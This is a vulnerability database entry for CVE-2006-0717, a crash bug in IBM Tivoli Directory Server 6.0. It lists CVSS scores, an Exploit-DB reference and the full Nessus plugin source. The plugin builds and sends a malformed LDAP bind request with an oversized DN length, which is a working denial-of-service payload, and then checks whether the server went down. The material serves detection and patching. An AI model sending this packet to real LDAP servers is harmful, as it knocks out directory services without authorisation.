Vulnerabilities > CVE-2006-0717 - LDAP Memory Corruption vulnerability in IBM Tivoli Directory Server 6.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
ibm
nessus
exploit available
NVD
Published: 2006-02-15
Updated: 2017-07-20

Summary

IBM Tivoli Directory Server 6.0 allows remote attackers to cause a denial of service (crash) via a crafted LDAP request, as demonstrated by test 2532 in the ProtoVer Sample LDAP test suite.

Vulnerable Configurations

Part Description Count
Application
Ibm
1

Exploit-Db

descriptionIBM Tivoli Directory Server 6.0 Unspecified LDAP Memory Corruption Vulnerability. CVE-2006-0717. Dos exploits for multiple platform
idEDB-ID:27196
last seen2016-02-03
modified2006-02-11
published2006-02-11
reporterEvgeny Legerov
sourcehttps://www.exploit-db.com/download/27196/
titleIBM Tivoli Directory Server 6.0 Unspecified LDAP Memory Corruption Vulnerability

Nessus

NASL familyDenial of Service
NASL idTIVOLI_LDAP_DN_LENGTH_DOS.NASL
descriptionThe remote host appears to be running IBM Tivoli Directory Server, an LDAP directory from IBM. The version of IBM Tivoli Directory Server fails to handle certain malformed search requests. A user can leverage this issue to crash the LDAP server.
last seen2020-06-01
modified2020-06-02
plugin id20903
published2006-02-14
reporterThis script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/20903
titleIBM Tivoli Directory Server LDAP Packet Handling DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(20903);
  script_version("1.16");
  script_cvs_date("Date: 2018/11/15 20:50:21");

  script_cve_id("CVE-2006-0717");
  script_bugtraq_id(16593);
 
  script_name(english:"IBM Tivoli Directory Server LDAP Packet Handling DoS");
  script_summary(english:"Checks for denial of service vulnerability in IBM Tivoli Directory Server");
 
  script_set_attribute(attribute:"synopsis", value:
"The remote LDAP server is prone to denial of service attacks." );
  script_set_attribute(attribute:"description", value:
"The remote host appears to be running IBM Tivoli Directory Server, an
LDAP directory from IBM. 

The version of IBM Tivoli Directory Server fails to handle certain
malformed search requests.  A user can leverage this issue to crash
the LDAP server." );
  script_set_attribute(attribute:"see_also", value:"http://web.archive.org/web/20071213090218/http://lists.immunitysec.com/pipermail/dailydave/2006-February/002921.html" );
  script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24011701" );
  script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24014476" );
  script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24011969" );
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate fix pack listed in the vendor support documents
referenced above." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/14");
  script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/11");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:tivoli_directory_server");
  script_end_attributes();
 
  script_category(ACT_DENIAL);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  script_dependencies("ldap_detect.nasl");
  script_require_ports("Services/ldap", 389);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

port = get_service(svc: "ldap", default: 389);


# A bad request.
req = raw_string(
  0x30,                                # universal sequence
  0x16,                                # length of the request
  0x02, 0x01, 0x01,                    # message id (1)
  0x60,                                # bind request
  0x12,                                #   length
  0x02,                                #   version
    0x01,                              #     length
    0x03,                              #     3
  0x04,                                #   DN
    0x84, 0xff, 0xff, 0xff, 0xff,      #     length
    "nessus",
  0x80, 0x00                           #   authentication (simple)
);


# Open a socket and send the request.
soc = open_sock_tcp(port);
if (! soc) exit(1);

  send(socket:soc, data:req);
  res = recv(socket:soc, length:1024);
  close(soc);

  # If we didn't get anything back, check whether it crashed.
if (isnull(res))
{
    if (service_is_dead(port: port) > 0)
      security_warning(port);
      exit(0);
}

References